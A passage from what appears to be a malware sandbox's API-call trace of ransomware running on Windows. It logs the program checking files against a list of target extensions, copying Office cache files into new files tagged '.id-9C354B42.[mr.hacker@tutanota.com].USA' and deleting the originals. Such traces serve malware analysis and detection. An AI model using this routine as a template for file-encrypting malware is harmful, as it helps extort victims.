returned 78 [0034.539] lstrlenW (lpString=".1cd") returned 4 [0034.539] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78 [0034.539] lstrlenW (lpString=".jpg") returned 4 [0034.539] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.539] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.539] lstrlenW (lpString="ProjectMUI.xml") returned 14 [0034.539] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.698] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1452) returned 1 [0034.698] CloseHandle (hObject=0x1a4) returned 1 [0034.699] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020 [0034.699] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.699] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.699] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.699] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.699] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0034.699] GetLastError () returned 0x0 [0034.699] ReadFile (in: hFile=0x1a4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x5ac, lpOverlapped=0x0) returned 1 [0034.701] WriteFile (in: hFile=0x1a8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.702] ReadFile (in: hFile=0x1a4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0034.702] WriteFile (in: hFile=0x1a8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.702] SetEndOfFile (hFile=0x1a8) returned 1 [0034.702] CloseHandle (hObject=0x1a8) returned 1 [0034.703] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.703] SetEndOfFile (hFile=0x1a4) returned 1 [0034.703] CloseHandle (hObject=0x1a4) returned 1 [0034.704] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.704] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0034.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.704] lstrlenW (lpString=".doc") returned 4 [0034.704] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.704] lstrlenW (lpString=".docx") returned 5 [0034.704] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.704] lstrlenW (lpString=".pdf") returned 4 [0034.704] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.704] lstrlenW (lpString=".xls") returned 4 [0034.704] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.704] lstrlenW (lpString=".xlsx") returned 5 [0034.704] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.704] lstrlenW (lpString=".ppt") returned 4 [0034.704] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.704] lstrlenW (lpString=".zip") returned 4 [0034.704] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.704] lstrlenW (lpString=".rar") returned 4 [0034.705] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString=".bz2") returned 4 [0034.705] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString=".7z") returned 3 [0034.705] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.705] lstrlenW (lpString=".dbf") returned 4 [0034.705] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.705] lstrlenW (lpString=".1cd") returned 4 [0034.705] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.705] lstrlenW (lpString=".jpg") returned 4 [0034.705] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.705] lstrlenW (lpString=".doc") returned 4 [0034.705] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString=".docx") returned 5 [0034.705] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.705] lstrlenW (lpString=".pdf") returned 4 [0034.705] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString=".xls") returned 4 [0034.705] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString=".xlsx") returned 5 [0034.705] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.705] lstrlenW (lpString=".ppt") returned 4 [0034.705] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.705] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.705] lstrlenW (lpString=".zip") returned 4 [0034.705] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.705] lstrlenW (lpString=".rar") returned 4 [0034.706] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".bz2") returned 4 [0034.706] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString=".7z") returned 3 [0034.706] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.706] lstrlenW (lpString=".dbf") returned 4 [0034.706] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.706] lstrlenW (lpString=".1cd") returned 4 [0034.706] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.706] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0034.706] lstrlenW (lpString=".jpg") returned 4 [0034.706] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.706] lstrcmpiW (lpString1=".chm", lpString2=".USA") returned -1 [0034.706] lstrlenW (lpString="setup.chm") returned 9 [0034.706] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.706] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=67190) returned 1 [0034.706] CloseHandle (hObject=0x1a4) returned 1 [0034.707] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 0x2020 [0034.707] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.707] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.707] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.707] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.707] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0034.707] GetLastError () returned 0x0 [0034.707] ReadFile (in: hFile=0x1a4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x10676, lpOverlapped=0x0) returned 1 [0034.710] WriteFile (in: hFile=0x1a8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x10680, lpOverlapped=0x0) returned 1 [0034.712] ReadFile (in: hFile=0x1a4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0034.712] WriteFile (in: hFile=0x1a8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.712] SetEndOfFile (hFile=0x1a8) returned 1 [0034.712] CloseHandle (hObject=0x1a8) returned 1 [0034.713] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.714] SetEndOfFile (hFile=0x1a4) returned 1 [0034.715] CloseHandle (hObject=0x1a4) returned 1 [0034.715] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.715] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 1 [0034.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.715] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.715] lstrlenW (lpString=".doc") returned 4 [0034.715] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0034.715] lstrlenW (lpString=".docx") returned 5 [0034.715] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0034.715] lstrlenW (lpString=".pdf") returned 4 [0034.715] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0034.715] lstrlenW (lpString=".xls") returned 4 [0034.715] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString=".xlsx") returned 5 [0034.716] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0034.716] lstrlenW (lpString=".ppt") returned 4 [0034.716] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.716] lstrlenW (lpString=".zip") returned 4 [0034.716] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString=".rar") returned 4 [0034.716] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString=".bz2") returned 4 [0034.716] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0034.716] lstrlenW (lpString=".7z") returned 3 [0034.716] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0034.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.716] lstrlenW (lpString=".dbf") returned 4 [0034.716] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.716] lstrlenW (lpString=".1cd") returned 4 [0034.716] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0034.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.716] lstrlenW (lpString=".jpg") returned 4 [0034.716] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.716] lstrlenW (lpString=".doc") returned 4 [0034.716] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString=".docx") returned 5 [0034.716] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0034.716] lstrlenW (lpString=".pdf") returned 4 [0034.716] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0034.716] lstrlenW (lpString=".xls") returned 4 [0034.716] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0034.717] lstrlenW (lpString=".xlsx") returned 5 [0034.717] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0034.717] lstrlenW (lpString=".ppt") returned 4 [0034.717] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0034.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.717] lstrlenW (lpString=".zip") returned 4 [0034.717] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0034.717] lstrlenW (lpString=".rar") returned 4 [0034.717] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0034.717] lstrlenW (lpString=".bz2") returned 4 [0034.717] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0034.717] lstrlenW (lpString=".7z") returned 3 [0034.717] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0034.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.717] lstrlenW (lpString=".dbf") returned 4 [0034.717] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0034.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.717] lstrlenW (lpString=".1cd") returned 4 [0034.717] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0034.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0034.717] lstrlenW (lpString=".jpg") returned 4 [0034.717] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0034.717] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.717] lstrlenW (lpString="Setup.xml") returned 9 [0034.717] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.718] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=9352) returned 1 [0034.718] CloseHandle (hObject=0x1a4) returned 1 [0034.718] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.718] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0034.718] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.718] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0034.718] GetLastError () returned 0x0 [0034.718] ReadFile (in: hFile=0x1a4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2488, lpOverlapped=0x0) returned 1 [0034.720] WriteFile (in: hFile=0x1a8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2490, lpOverlapped=0x0) returned 1 [0034.721] ReadFile (in: hFile=0x1a4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0034.721] WriteFile (in: hFile=0x1a8, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.721] SetEndOfFile (hFile=0x1a8) returned 1 [0034.721] CloseHandle (hObject=0x1a8) returned 1 [0034.722] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0034.722] SetEndOfFile (hFile=0x1a4) returned 1 [0034.723] CloseHandle (hObject=0x1a4) returned 1 [0034.723] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.723] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.723] lstrlenW (lpString=".doc") returned 4 [0034.723] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.723] lstrlenW (lpString=".docx") returned 5 [0034.723] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.723] lstrlenW (lpString=".pdf") returned 4 [0034.724] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString=".xls") returned 4 [0034.724] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString=".xlsx") returned 5 [0034.724] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.724] lstrlenW (lpString=".ppt") returned 4 [0034.724] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.724] lstrlenW (lpString=".zip") returned 4 [0034.724] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.724] lstrlenW (lpString=".rar") returned 4 [0034.724] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString=".bz2") returned 4 [0034.724] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString=".7z") returned 3 [0034.724] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.724] lstrlenW (lpString=".dbf") returned 4 [0034.724] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.724] lstrlenW (lpString=".1cd") returned 4 [0034.724] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.724] lstrlenW (lpString=".jpg") returned 4 [0034.724] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.724] lstrlenW (lpString=".doc") returned 4 [0034.724] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.724] lstrlenW (lpString=".docx") returned 5 [0034.724] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.724] lstrlenW (lpString=".pdf") returned 4 [0034.724] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.725] lstrlenW (lpString=".xls") returned 4 [0034.942] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.942] lstrlenW (lpString=".xlsx") returned 5 [0034.942] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.942] lstrlenW (lpString=".ppt") returned 4 [0034.942] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.942] lstrlenW (lpString=".zip") returned 4 [0034.942] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.942] lstrlenW (lpString=".rar") returned 4 [0034.942] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.942] lstrlenW (lpString=".bz2") returned 4 [0034.942] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.942] lstrlenW (lpString=".7z") returned 3 [0034.942] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.942] 